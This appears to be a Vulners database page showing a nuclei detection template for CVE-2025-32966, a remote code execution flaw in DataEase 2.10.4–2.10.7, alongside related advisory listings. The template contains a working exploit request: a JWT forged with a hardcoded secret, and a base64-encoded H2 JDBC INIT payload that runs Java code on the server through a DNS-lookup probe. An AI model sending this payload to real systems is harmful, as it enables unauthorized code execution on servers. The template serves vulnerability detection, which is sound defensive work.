Lucene search
K

DataEase 2.10.4-2.10.7 - Remote Code Execution

🗓️ 09 Jul 2026 03:01:09Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 13 Views

DataEase vulnerable to authenticated remote code execution via insecure JDBC links; upgrade 2.10.8.

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2025-32966
23 Apr 202516:17
circl
CNNVD
DataEase 安全漏洞
23 Apr 202500:00
cnnvd
CVE
CVE-2025-32966
23 Apr 202515:21
cve
Cvelist
CVE-2025-32966 Dataease H2 JDBC Connection Remote Code Execution
23 Apr 202515:21
cvelist
EUVD
EUVD-2025-12406
3 Oct 202520:07
euvd
NVD
CVE-2025-32966
23 Apr 202516:15
nvd
OSV
CVE-2025-32966 Dataease H2 JDBC Connection Remote Code Execution
23 Apr 202515:21
osv
Positive Technologies
PT-2025-17642 · Dataease · Dataease
23 Apr 202500:00
ptsecurity
RedhatCVE
CVE-2025-32966
25 Apr 202520:58
redhatcve
RedhatCVE
CVE-2025-49002
5 Jun 202521:18
redhatcve
Rows per page
id: CVE-2025-32966

info:
  name: DataEase 2.10.4-2.10.7 - Remote Code Execution
  author: ChrisJr404
  severity: critical
  description: |
    DataEase prior to version 2.10.8 contains a remote code execution caused by insecure backend JDBC link handling, letting authenticated users execute arbitrary code, exploit requires user authentication.
  impact: |
    Authenticated users can execute arbitrary code on the server, potentially leading to full system compromise.
  remediation: |
    Update to version 2.10.8 or later.
  reference:
    - https://github.com/dataease/dataease/security/advisories/GHSA-h7hj-4j78-cvc7
    - https://github.com/dataease/dataease/security/advisories/GHSA-xx2m-gmwg-mf3r
    - https://github.com/vulhub/vulhub/tree/master/dataease/CVE-2025-32966
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2025-32966
    cwe-id: CWE-94
    epss-score: 0.03925
    epss-percentile: 0.891
  metadata:
    verified: true
    max-request: 1
    vendor: dataease
    product: dataease
    shodan-query: http.html:"dataease"
    fofa-query: body="dataease"
  tags: cve,cve2025,dataease,h2,rce,jdbc,oss

variables:
  unique: "{{rand_text_alpha(10)}}.{{rand_text_alpha(8)}}.local"
  inner_payload: '{"jdbc":"jdbc:h2:mem:pwn;MODE=MSSQLServer;INIT=CREATE ALIAS LK AS $$void lk() throws java.io.IOException { java.net.InetAddress.getByName(\"{{unique}}\")\\; }$$\\;CALL LK()","username":"","password":"","driver":"org.h2.Driver"}'
  conf_b64: "{{base64(inner_payload)}}"
  jwt_claims: '{"uid":1,"oid":1,"exp":{{unix_time(3600)}}}'
  forged_jwt: '{{generate_jwt(jwt_claims,"HS256","ChrisJr404") }}'

http:
  - raw:
      - |
        POST /de2api/datasource/validate HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json
        X-DE-TOKEN: {{forged_jwt}}

        {"name":"p","type":"h2","configuration":"{{conf_b64}}"}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 400'
          - 'contains_all(body, "Exception calling user-defined function", "{{unique}}", "CREATE ALIAS LK")'
        condition: and
# digest: 4a0a00473045022100dac9f8e4c1a8dc8fc3f4a50a4ad70e73b3e33a936b7af46577e084a74b7a952b022068d970b93adebe6dc3064c30cab74b74305a5dca7df3edb69e313f0a91b9ec90:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

02 May 2026 17:34Current
6.8Medium risk
Vulners AI Score6.8
CVSS 3.19.8
CVSS 49.2
EPSS0.03925
SSVC
13